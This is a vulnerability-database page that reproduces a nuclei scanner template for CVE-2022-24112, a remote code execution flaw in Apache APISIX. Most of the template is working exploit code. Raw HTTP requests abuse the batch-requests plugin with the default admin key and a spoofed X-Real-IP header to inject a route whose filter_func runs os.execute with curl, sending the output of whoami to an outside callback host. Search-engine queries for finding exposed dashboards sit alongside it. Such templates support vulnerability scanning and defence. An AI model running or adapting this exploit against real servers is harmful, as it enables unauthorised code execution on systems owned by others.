Lucene search
K

Apache APISIX - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 54 Views

Apache APISIX Remote Code Execution vulnerabilit

Related
Refs
Code
id: CVE-2022-24112

info:
  name: Apache APISIX - Remote Code Execution
  author: Mr-xn
  severity: critical
  description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
  reference:
    - https://www.openwall.com/lists/oss-security/2022/02/11/3
    - https://twitter.com/sirifu4k1/status/1496043663704858625
    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
    - http://www.openwall.com/lists/oss-security/2022/02/11/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24112
    cwe-id: CWE-290
    epss-score: 0.96182
    epss-percentile: 0.9987
    cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: apisix
    shodan-query:
      - title:"Apache APISIX Dashboard"
      - http.title:"apache apisix dashboard"
    fofa-query:
      - title="Apache APISIX Dashboard"
      - title="apache apisix dashboard"
    google-query: intitle:"apache apisix dashboard"
  tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /apisix/batch-requests HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

        {
          "headers":{
            "X-Real-IP":"127.0.0.1",
            "Content-Type":"application/json"
          },
          "timeout":1500,
          "pipeline":[
            {
              "method":"PUT",
              "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
              "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
            }
          ]
        }
      - |
        GET /api/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '"reason":"OK"'
          - '"status":200'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - GET \/([a-z-]+) HTTP
        part: interactsh_request
# digest: 4a0a00473045022037c63f1eae883e4e4e90ddf7d03afd2d146aca85c10e3fa9d633dd9434ee356d022100db2c0fc6a6d7e6215a7a854df47960e36f71663716ec559cfcaa213624a1c8f6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
CVSS 3.19.8
EPSS0.96182
SSVC
54